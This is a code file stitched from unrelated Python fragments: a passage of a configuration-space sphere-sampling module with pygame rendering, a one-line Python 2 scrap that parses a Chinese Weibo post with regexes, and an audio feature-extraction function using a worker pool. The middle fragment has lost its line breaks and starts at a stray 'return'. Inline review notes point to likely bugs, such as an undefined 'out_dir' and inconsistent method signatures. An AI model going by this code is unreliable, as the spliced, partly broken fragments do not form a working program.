            if any(sample.isInside((rnd1, rnd2), width, height)
                   for sample in self.mDistSamples):
                failTime += 1
                continue
            # Randomly shoot rays to get the nearest distance to obstacles.
            rayShooter = RayShooter(rnd1, rnd2, self.mCollisionMgr, self.mCSpace)
            dist = rayShooter.randShoot(72)
            if math.fabs(dist) >= 1.0:
                newDistSamp = DistSample(rnd1, rnd2, dist)
                print("failed times: {0}".format(failTime))
                return newDistSamp
            failTime += 1
        return None

    # Strategy 2: randomly sample one sphere, then sample from its boundary,
    # then keep sampling the new boundary of the growing set of spheres.
    def distSampleOneThread(self, num, imgSurface=None):
        """Fill ``self.mDistSamples`` by growing spheres from random seeds.

        A seed is obtained from ``getARandomFreeSample``; its boundary
        configurations are queued and each one that is collision free, lies
        outside every known sphere and is at least 2.0 away from obstacles
        becomes a new sphere whose boundary is queued in turn.  When the
        queue runs dry a new seed is drawn; the method returns once no seed
        can be found.

        @param num: failure budget passed to ``getARandomFreeSample``.
        @param imgSurface: optional surface each accepted sphere is drawn on.
        """
        self.mDistSamples = []
        boundaryQueue = Queue()
        width = self.mCSpace.mScaledWidth
        height = self.mCSpace.mScaledHeight
        while True:
            randFreeSamp = self.getARandomFreeSample(num)
            if randFreeSamp is None:
                return
            self.mDistSamples.append(randFreeSamp)
            self.drawDistSample(
                imgSurface,
                (randFreeSamp.mSample[0], randFreeSamp.mSample[1]),
                randFreeSamp.mRadius)
            for bndConfig in randFreeSamp.getBoundaryConfigs(width, height):
                boundaryQueue.put(bndConfig)

            while not boundaryQueue.empty():
                bnd = boundaryQueue.get()
                point = (bnd[0], bnd[1])
                # NOTE(review): the collision query here uses the scaled
                # coordinates, while getARandomFreeSample maps to the
                # unscaled space first - confirm which one is intended.
                if self.mCollisionMgr.ifCollide(point):
                    continue
                if any(sample.isInside(point, width, height)
                       for sample in self.mDistSamples):
                    continue
                # Randomly shoot rays to get the nearest distance to obstacles.
                rayShooter = RayShooter(bnd[0], bnd[1], self.mCollisionMgr, self.mCSpace)
                dist = rayShooter.randShoot(72)
                if dist >= 2.0:  # not too close to obstacles
                    newDistSamp = DistSample(bnd[0], bnd[1], dist)
                    self.mDistSamples.append(newDistSamp)
                    self.drawDistSample(
                        imgSurface,
                        (newDistSamp.mSample[0], newDistSamp.mSample[1]),
                        newDistSamp.mRadius)
                    for bndConfig in newDistSamp.getBoundaryConfigs(width, height):
                        boundaryQueue.put(bndConfig)

    def renderAllDistSamples(self, ImgSurface):
        """Render every distance sample to the image.

        Samples with a positive radius are drawn in the free colour, all
        others in the obstacle colour.
        """
        print("render {0} dist samples to the image".format(len(self.mDistSamples)))
        freeColor = (0, 0, 250)
        obstColor = (200, 0, 100)
        for samp in self.mDistSamples:
            color = freeColor if samp.mRadius > 0 else obstColor
            self.drawDistSample(
                ImgSurface,
                (int(samp.mSample[0]), int(samp.mSample[1])),
                int(math.fabs(samp.mRadius)),
                color)

    def drawDistSample(self, imgsurf, origin, radius, color=(0, 0, 250)):
        """Draw one sample as a circle outline, wrapped around the borders.

        Nothing happens when ``imgsurf`` is ``None`` or ``radius`` is not in
        ``(0, 1000000000]``.
        """
        if imgsurf is None or not (0 < radius <= 1000000000):
            return
        x, y, r = int(origin[0]), int(origin[1]), int(radius)
        pygame.draw.circle(imgsurf, color, (x, y), r, 1)
        # NOTE(review): 900 is presumably the scaled width/height of the
        # space - confirm before replacing it with mCSpace values.
        if origin[0] - radius < 0:
            pygame.draw.circle(imgsurf, color, (x + 900, y), r, 1)
        if origin[1] - radius < 0:
            pygame.draw.circle(imgsurf, color, (x, y + 900), r, 1)
        if origin[0] + radius > 900:
            pygame.draw.circle(imgsurf, color, (x - 900, y), r, 1)
        if origin[1] + radius > 900:
            pygame.draw.circle(imgsurf, color, (x, y - 900), r, 1)
        # Drain pending events (they are ignored) before refreshing.
        pygame.event.get()
        pygame.display.update()

    def writeSamplesToFile(self, filename):
        """Write ``self.mDistSamples`` as ``x<TAB>y<TAB>radius`` lines."""
        lines = ["{0}\t{1}\t{2}\n".format(vector.mSample[0], vector.mSample[1], vector.mRadius)
                 for vector in self.mDistSamples]
        with open(filename, 'w') as file2write:
            file2write.write("".join(lines))

    def loadDistSamplesFromFile(self, filename):
        """Replace ``self.mDistSamples`` with the samples stored in a file.

        Lines are ``x<TAB>y<TAB>radius``; only samples whose radius is
        greater than 2 are kept.  Blank lines are skipped.
        """
        with open(filename, 'r') as file2read:
            self.mDistSamples = []
            for line in file2read:
                if not line.strip():
                    continue
                info = line.split('\t')
                distSamp = DistSample(float(info[0]), float(info[1]), float(info[2]))
                if distSamp.mRadius > 2:
                    self.mDistSamples.append(distSamp)
class SampleManager:
    """Sample an N-dimensional configuration space and keep the results.

    ``mFreeSamples`` / ``mObstSamples`` hold raw configurations classified by
    the collision manager; ``mDistSamples`` holds ``DistSample`` spheres, and
    ``mSpacePartition`` indexes spheres by grid cell.
    """

    def __init__(self, CSpace):
        """Bind the manager to ``CSpace`` and create empty sample stores.

        @param CSpace: configuration space; ``mCollisionMgr`` and
            ``mMaxDimLens`` are read from it.  The space partition uses a
            unit length of 100 in every dimension.
        """
        self.mCSpace = CSpace
        self.mCollisionMgr = CSpace.mCollisionMgr
        self.mDistSamples = Manager().list()
        self.mFreeSamples = []
        self.mObstSamples = []
        self.g_failTimes = Value('i', 0)
        unitLens = [100] * len(self.mCSpace.mMaxDimLens)
        self.mSpacePartition = SpacePartition(self.mCSpace.mMaxDimLens, unitLens)

    def _randomConfig(self, dim, maxDimLens):
        """Return a random configuration: one ``randrange`` draw per dimension."""
        return [randrange(0, maxDimLens[i]) for i in range(dim)]

    def _pruneCoveredBoundaries(self, boundaryQueue, maxDimLens):
        """Return the queued configs not inside any sphere of their grid cell."""
        kept = []
        for cfg in boundaryQueue:
            grid = self.mSpacePartition.getContainingGrid(cfg)
            if not any(sphere.isInside(cfg, maxDimLens) for sphere in grid.mContainer):
                kept.append(cfg)
        return kept

    def getFreeSamples(self, num, dim, maxDimLens):
        """Append ``num`` collision-free random samples to ``mFreeSamples``."""
        size = 0
        while size < num:
            rnd = self._randomConfig(dim, maxDimLens)
            if not self.mCollisionMgr.ifCollide(rnd):
                self.mFreeSamples.append(rnd)
                size += 1

    def randomSample(self, num, dim, maxDimLens):
        """Draw ``num`` random samples and sort them into free / obstacle lists."""
        for _ in range(num):
            rnd = self._randomConfig(dim, maxDimLens)
            if self.mCollisionMgr.ifCollide(rnd):
                self.mObstSamples.append(rnd)
            else:
                self.mFreeSamples.append(rnd)

    def getARandomFreeSample(self, num, maxDimLens, dim):
        """Randomly sample the space and return a free sample with distance info.

        The sample is not inside any sphere stored in its grid cell of the
        space partition.  The new sample is NOT added to
        ``self.mDistSamples`` by this method.

        @param num: failure budget.  After ``num`` failed attempts ``None``
            is returned.
        @return: a ``DistSample`` or ``None``.
        """
        failTime = 0
        while failTime < num:
            rnd = self._randomConfig(dim, maxDimLens)
            if self.mCollisionMgr.ifCollide(rnd):
                # Colliding draws are retried without counting as a failure.
                continue
            grid = self.mSpacePartition.getContainingGrid(rnd)
            # NOTE(review): isInside is called with one argument here but
            # with (config, maxDimLens) everywhere else - confirm signature.
            if any(sphere.isInside(rnd) for sphere in grid.mContainer):
                failTime += 1
                continue
            # Randomly shoot rays to get the nearest distance to obstacles.
            rayShooter = RayShooter(rnd, self.mCollisionMgr, self.mCSpace)
            dist = rayShooter.randShoot(50 * 2)
            if math.fabs(dist) >= 1.0:
                newDistSamp = DistSample(rnd, dist)
                print("------>\tfailed times: {0}".format(failTime))
                return newDistSamp
            failTime += 1
        return None

    def distSampleUsingObstSurfSamps(self, num, maxDimLens):
        """Grow distance samples using obstacle-surface search for radii.

        100 random samples seed an ``ObstSurfSearcher``; spheres are then
        grown from random seeds along their boundaries.  A boundary config
        becomes a sphere when it is collision free (checked in unscaled
        space), outside the spheres of its grid cell and at least 30.0 from
        the nearest obstacle-surface config.

        @param num: failure time to sample a new configuration randomly.
        """
        self.randomSample(100, len(maxDimLens), maxDimLens)
        searcher = ObstSurfSearcher(self.mCollisionMgr, self.mCSpace)
        searcher.searchObstSurfConfigs(self.mFreeSamples, self.mObstSamples, 2)

        self.mDistSamples = []
        boundaryQueue = []
        while True:
            # NOTE(review): dim is hard-coded to 2 here although
            # len(maxDimLens) is used for randomSample above - confirm.
            randFreeSamp = self.getARandomFreeSample(num, maxDimLens, 2)
            if randFreeSamp is None:
                return
            # NOTE(review): seed spheres are not added to mSpacePartition,
            # unlike spheres found from the boundary queue - confirm.
            self.mDistSamples.append(randFreeSamp)
            boundaryQueue.extend(randFreeSamp.getBoundaryConfigs(maxDimLens))

            while boundaryQueue:
                bnd = boundaryQueue.pop(0)
                bndUnscaled = self.mCSpace.map2UnscaledSpace(bnd)
                if self.mCollisionMgr.ifCollide(bndUnscaled):
                    continue
                grid = self.mSpacePartition.getContainingGrid(bnd)
                if any(sphere.isInside(bnd, maxDimLens) for sphere in grid.mContainer):
                    continue
                # Nearest distance to the obstacle-surface configurations.
                dist, _neighbor = searcher.getNearest(bnd)
                if dist >= 30.0:  # not too close to obstacles
                    newDistSamp = DistSample(bnd, dist)
                    print("{0} R: {1}".format(bnd, dist))
                    self.mDistSamples.append(newDistSamp)
                    self.mSpacePartition.addSphere(newDistSamp)
                    boundaryQueue.extend(newDistSamp.getBoundaryConfigs(maxDimLens))
                    if len(self.mDistSamples) % 30 == 0:
                        print("------------ FRESH -------------")
                        # Build a filtered copy instead of deleting from the
                        # list while iterating over it.
                        boundaryQueue = self._pruneCoveredBoundaries(boundaryQueue, maxDimLens)
                    print("\t\t\t\t\t\t\t\t\t\t{0}\n".format(len(boundaryQueue)))

    def distSampleOneThread(self, num, maxDimLens):
        """Grow distance samples using ray shooting for radii.

        Same boundary-growing scheme as ``distSampleUsingObstSurfSamps``, but
        coverage is checked against every sphere in ``self.mDistSamples`` and
        the radius comes from ``RayShooter.randShoot``; a sphere needs a
        radius of at least 40.0.  The method returns when the sample count
        reaches exactly 100 after a boundary sphere is added, or when no new
        seed can be found.

        @param num: failure time to sample a new configuration randomly.
        """
        self.mDistSamples = []
        boundaryQueue = []
        while True:
            randFreeSamp = self.getARandomFreeSample(num, maxDimLens, len(maxDimLens))
            if randFreeSamp is None:
                return
            self.mDistSamples.append(randFreeSamp)
            boundaryQueue.extend(randFreeSamp.getBoundaryConfigs(maxDimLens))

            while boundaryQueue:
                bnd = boundaryQueue.pop(0)
                if self.mCollisionMgr.ifCollide(bnd):
                    continue
                if any(sample.isInside(bnd, maxDimLens) for sample in self.mDistSamples):
                    continue
                # Randomly shoot rays to get the nearest distance to obstacles.
                rayShooter = RayShooter(bnd, self.mCollisionMgr, self.mCSpace)
                dim = len(maxDimLens)
                dist = rayShooter.randShoot(50 * (dim - 1))
                if dist >= 40.0:  # not too close to obstacles
                    newDistSamp = DistSample(bnd, dist)
                    print("{0} R: {1}".format(bnd, dist))
                    self.mDistSamples.append(newDistSamp)
                    bounds = newDistSamp.getBoundaryConfigs(maxDimLens)
                    if len(self.mDistSamples) == 100:
                        return
                    boundaryQueue.extend(bounds)
                    if len(self.mDistSamples) % 100 == 0:
                        print("------------ FRESH -------------")
                        for sphere in self.mDistSamples:
                            boundaryQueue = [x for x in boundaryQueue
                                             if not sphere.isInside(x, maxDimLens)]
                    print("\t\t\t\t\t\t\t\t\t{0}\n".format(len(boundaryQueue)))

    def writeSamplesToFile(self, filename):
        """Write each sample as tab-separated coordinates followed by the radius."""
        lines = []
        for vector in self.mDistSamples:
            coords = "".join(str(value) + "\t" for value in vector.mSample)
            lines.append(coords + str(vector.mRadius) + "\n")
        with open(filename, 'w') as file2write:
            file2write.write("".join(lines))

    def loadDistSamplesFromFile(self, filename):
        """Replace ``self.mDistSamples`` with the samples stored in a file.

        Every line holds tab-separated coordinates followed by the radius.
        Samples with a radius of at least 2 are kept and also registered in
        the space partition.  Blank lines are skipped.
        """
        with open(filename, 'r') as file2read:
            self.mDistSamples = []
            for lineNum, line in enumerate(file2read):
                if lineNum % 100 == 0:
                    print("Reading line: {0}".format(lineNum))
                if not line.strip():
                    continue
                info = line.split('\t')
                pos = [float(value) for value in info[:-1]]
                radius = float(info[-1])
                distSamp = DistSample(tuple(pos), radius)
                if distSamp.mRadius >= 2:
                    self.mDistSamples.append(distSamp)
                    self.mSpacePartition.addSphere(distSamp)

    def renderDistSamples(self, imgSurf):
        """Ask every distance sample to render itself on ``imgSurf``."""
        for samp in self.mDistSamples:
            samp.render(imgSurf, (0, 250, 0))
return t1, t2, t3 t = tt() print t print '博文', t[2] z = zip(t[0], t[1], t[2]) print len(z) for i in range(len(z)): print z[i] from multiprocessing import Process, Manager l = Manager().list() d = {1: 1, 2: 2, 3: 3, 4: 4} l.append(d) print l j = 'id 1749990115 博文id M_DwImDw3ct 博文 【悲催!男子欲滑翔求婚 不想挂树上了[笑cry]】21日,湖北宜昌一男子乘坐滑翔伞在空中向女朋友求婚。但在降落时,因一阵强风被刮到树上,被挂近一小时,最后请来吊车救援。辛苦下树的男子手抱花束,来到女友面前求婚。但女友没有答应转身离去……网友:天公不作美,求婚现场成事故现场[doge](三峡晚报 全文' topic_patternts = re.compile('【.*?】') topic = topic_patternts.findall(j) print topic[0] if len(topic) > 0: topic_clean_pattern = re.compile('(\[.*?])') topic = re.sub(topic_clean_pattern, '', topic[0]) topic_clean2_pattern = re.compile('#(.*?)#') topic = re.sub(topic_clean2_pattern, '', topic) print topic
def extractFeatures(src_dir, base_dir='extracted_features', dataset='us',
                    aug_type='origin', save=False):
    """Scan ``src_dir`` for audio clips and run tag/label extraction in a pool.

    Every audio file under ``src_dir`` (as decided by ``isAudioFile``) is
    grouped by the clip name returned by ``getFileInfo``; a clip that occurs
    with several tags gets one multi-hot target vector of length ``NUM_TAG``.
    The collected ``(path, name, target)`` tuples are then mapped over
    ``_func_tag_label`` in a worker pool.

    :param src_dir: root directory that is walked for audio files.
    :param base_dir: output sub-directory name; an empty string selects the
        parent directory of ``src_dir``.
    :param dataset: dataset identifier forwarded to ``isAudioFile``,
        ``getFileInfo`` and the pool initializer.
    :param aug_type: augmentation type forwarded to the pool initializer.
    :param save: not used by this function.
    :return: ``None``.
    """
    if base_dir == '':
        base_dir = path.split(path.abspath(src_dir))[0]

    n_cores = 20
    feat_type = 'logmelspec10000'
    sr = 44100
    win_size = [1024, 4096, 16384]
    hop_size = 512
    n_mels = 128

    # NOTE(review): dir_name and base_dir only fed the feat_dir path below,
    # which is commented out, so they are currently unused.
    dir_name = '{}.{}_{}_{}'.format(feat_type, sr, hop_size, n_mels)
    for ws in win_size:
        dir_name += '.' + str(int(ws / 1024))
    # feat_dir = path.join('data/feature',
    #                      dir_name,
    #                      base_dir)

    # Clip name -> (first path seen, clip name, multi-hot tag vector).
    fp_dict = {}
    for root, _dirs, files in os.walk(src_dir):
        if not files:
            continue
        nof = 0
        for in_fn in files:
            if not isAudioFile(in_fn, dataset):
                continue
            in_fp = path.join(root, in_fn)
            fn, tn = getFileInfo(in_fp, dataset)
            if fn in fp_dict:
                # Same clip under another tag: set that bit as well.
                fp_dict[fn][-1][tn] = 1
            else:
                target = np.zeros(NUM_TAG, dtype=int)
                target[tn] = 1
                fp_dict[fn] = (in_fp, fn, target)
            nof += 1
        print('{} files in {}'.format(nof, root))

    print('We got totally {} clips.'.format(len(fp_dict)))

    # num_stat[k - 1] counts the clips that carry exactly k tags.
    num_stat = np.zeros(NUM_TAG, dtype=int)
    for _p, _n, tags in fp_dict.values():
        num_stat[np.sum(tags) - 1] += 1
    print('Number of clips according to each number of tags:')
    for i in range(NUM_TAG):
        print('tags: {}, clips: {}'.format(i + 1, num_stat[i]))

    # Names of features that already exist on disk, shared with the workers.
    # NOTE(review): out_dir is not defined in this function; it is presumably
    # a module-level name (or the commented-out feat_dir) - confirm.
    existing = []
    for _root, _dirs, files in os.walk(out_dir):
        for _fn in files:
            existing.append(_fn.replace('.npy', ''))
    all_feat = Manager().list(existing)
    lock = Lock()
    func = _func_tag_label

    pool = Pool(processes=n_cores,
                initializer=initProcess,
                initargs=(dataset, all_feat, lock, sr, win_size, hop_size,
                          n_mels, aug_type))
    try:
        pool.map(func, fp_dict.values())
    finally:
        # Shut the workers down even when a task raised.
        pool.close()
        pool.join()